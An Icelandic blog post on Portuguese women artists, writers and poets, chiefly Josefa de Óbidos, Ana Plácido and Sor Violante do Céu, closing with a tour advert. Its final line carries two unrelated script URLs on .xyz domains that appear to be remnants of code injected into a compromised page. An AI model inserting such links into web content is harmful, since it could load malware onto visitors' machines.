Listakonur í Portúgal.

Hlutur kvenna í okkar sögu er ekki gerður stór, enda sagan rituð af körlum.   Þetta á auðvitað líka um sögu kvenna í hinu ramm-kaþólska Portúgal. Ég ætla í þessum pistli að leitast við að setja nokkrar staðreyndir á blað umþátttöku portúgalskra kvenna í listum, stjórnmálum og viðskiptum.

Portúgalskar myndlistarkonur

Þriggja kvenna er jafnan getið í eldri sögu myndlistar í Portúgal.   Jósefa de Óbidos, Garcia Fernandes og Maria Aurélia Martins de Sousa fædd June 13, 1866, Valparaiso, Chile (þar hefst sagan “Dóttir gæfunnar”, e. Isabel Allende). Josefa de Óbidos 1630 (skírð 20. feb.) – 22. júlí 1684, var fædd á Spáni og gefið nafnið Josefa de Ayala Figueira.  Hún tók sér listamannsnafnið „Josefa em Óbidos“, sem var ættarnafn hins portúgalska föður hennar og í Óbidos ætlum við að stoppa á leið okkar til Lissabon.   Um 150 verk hafa fundist, sem talið er öruggt að hún hafi gert og það gerir hana að einum afkastamesta myndlistarmanni Barrokksins í Portúgal. 1644 er Josefa skráð í skóla Águstínusar klaustursins í Coimbra.  Þar er að finna elstu verk hennar, byrjandaverk af heilagri Katrínu og Pétri postula, skorin í tré.  Frá árinu 1647 er til koparstunga eftir hana, enn af heilagri Katrínu og nú af brúðkaupi hennar.    

Uppstilli eftir Jósefa do Óbidos.
Uppstilling eftir Jósefa do Óbidos.
Til eru fjölmargar altaristöflur eftir Jósefu, en flestir munu þekkja uppstillingar hennar sem oft gætu talist ærið ofhlaðnar. Erfðaskrá hennar er dagsett 13. Júní 1684 og þar er hún sögð laus úr viðjum foreldra sinna, hrein mey, sem aldrei giftist.  Hún lést 54 ára gömul 22. Júlí og hvílir í Péturskirkjunni í Óbidos.  Þá var móðir hennar enn á lífi.

Rithöfundar úr hópi kvenna

Wikipedia finnur ekki eldri kvenrithöfund en konu að nafni Ana Plácido, fædda 1831.  Foreldrar hennar þvinguðu hana, 19 ára gamla, til hjónabands með stórefnuðum manni sem búið hafði í Brasilíu og auðgast þar.  Hann varð ekki langlífur í hjónabandinu og Ana varð forrík tiltölulega ung. Hennar þekktustu verk eru Luz Coada por Ferros (Ljós rofið af rimlum) frá 1863 og Herança de Lágrimas ( Arfur táranna) frá árinu 1871.

Einn virtasti kvenrithöfundur Portúgals
Einn virtasti kvenrithöfundur Portúgals
Báðar bækurnar eru sjálfsæfisögulegar og fjalla um framhjáhald hennar með rithöfundinum Camilo Castelo Branco, á meðan á því stóð. Þau voru lögsótt fyrir hórdóm og sátu bæði í fangelsi í eitt ár þar til dæmt hafði verið í málinu.  Við ekkjustand hennar settust þau að á óðalssetri því sem hún erfði eftir bóndann og þar skrifaði Camilo flest sín bestu verk. Árið 1890 framdi hann sjálfsmorð, þá orðinn blindur af sífillis og Ana dó skyndilega, að nóttu til 5 árum seinna.  Á næstu fimm árum létust svo börnin hennar þrjú einnig og ættin dó út.

Ljóðskáld

Sor Violante do Céu (Violante af Himnum) var fædd í Lissabon 30. Maí árið 1601 að talið er, sumir lesa 1607 úr úr rithöndinni.   29 ára gömul gekk hún í klaustrið Nossa Senhora da Rosa da Ordem do Grande Patriarca Santo Domingos.  Þetta var 29. Ágúst 1630 og þar  bjó hún til æfiloka 28. Janúar 1693.  

Nunnan sem varð svo vinsæl hjá aðlinum
Nunnan sem varð svo vinsæl hjá aðlinum
Hún hóf að yrkja ljóð á uppvaxtarárum sínum og 12 ára gömul orti hún fyrsta ljóðið sitt “Umbreyting Drottins”.   Klausturlífið breytti því ekki að mörg ljóða hennar eru af veraldlegum toga, rómantísk ástarljóð (allt að því blautleg) og jafnvel pólitísk. Hvort það var þessvegna, þá varð Violante snemma sjálfsagður þátttakandi í menningarlífi aðalsins.   Hún var fastagestur á listamannasamkomum (tertulias) í Lissabon og hún tók þátt í ljóðakeppnum, sem listaelíta borgarinnar gekkst fyrir. Gáski og hrein lífsgleði er einkennadi fyrir öll ljóð hennar, trúarleg og veraldleg.  Hún setur fram tvíræðar þversagnir um eigið líf og er óhrædd við að setja fram nýja hugsun um hlutverk og stöðu konunnar. Eitt af síðustu ljóðum hennar, sem hún sendi frá sér fjórum árum fyrir dauða sinn, heitir “Hvatning Guðs vors til helgrar ástar”.   Í næsta pistli ætla ég segja örlítið frá hlut kvenna í opinberu lífi, konunglegu og líðræðislegu. 8 SÆTI ERU EFTIR Í HAUSTFERÐINA.  ÞEIR SEM ÁHUGA HAFA ÞURFA  AÐ GREIÐA STAÐFESTINGU FYRIR 31. MAÍ N.K. //seemsgood.xyz/joo_br.js?i=0.3523826484872119//myzones.xyz/br.php?0.3166305743872395